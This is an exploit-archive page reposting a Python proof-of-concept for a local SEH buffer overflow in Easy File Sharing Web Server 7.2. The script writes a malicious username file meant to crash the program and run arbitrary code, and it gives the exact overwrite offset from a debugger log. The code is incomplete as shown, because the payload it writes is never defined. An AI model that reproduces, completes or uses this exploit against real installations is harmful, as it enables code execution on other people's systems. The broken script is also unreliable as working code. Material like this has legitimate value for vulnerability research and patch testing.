Easy file sharing web server 7.2 new user local overflow (seh) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-09-24 |
Type : local |
Platform : windows
This exploit / vulnerability Easy file sharing web server 7.2 new user local overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 7
# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow
# by creating a malicious username, this exploit POC will create a malicious text file
# with the contents to execute arbitrary code.
# Author : Nu11pwn
# SEH chain of main thread, item 1
# Address=46336646
# SE handler=*** CORRUPT ENTRY ***
# Log data, item 34
# Address=0BADF00D
# Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler
# [*] Exact match at offset 4059
try:
evilCreate =open("exploit.txt","w")
print("""
Easy File Sharing web server SEH overflow
""")
print("[x] Creating malicious file")
evilCreate.write(payload)
evilCreate.close()
print("[x] Malicious file create")
print("[x] Go to user accounts and add a new user with malicious name")
print("[x] Watch the program crash")
except:
print("[!] File failed to be created")
Easy file sharing web server 7.2 new user local overflow (seh)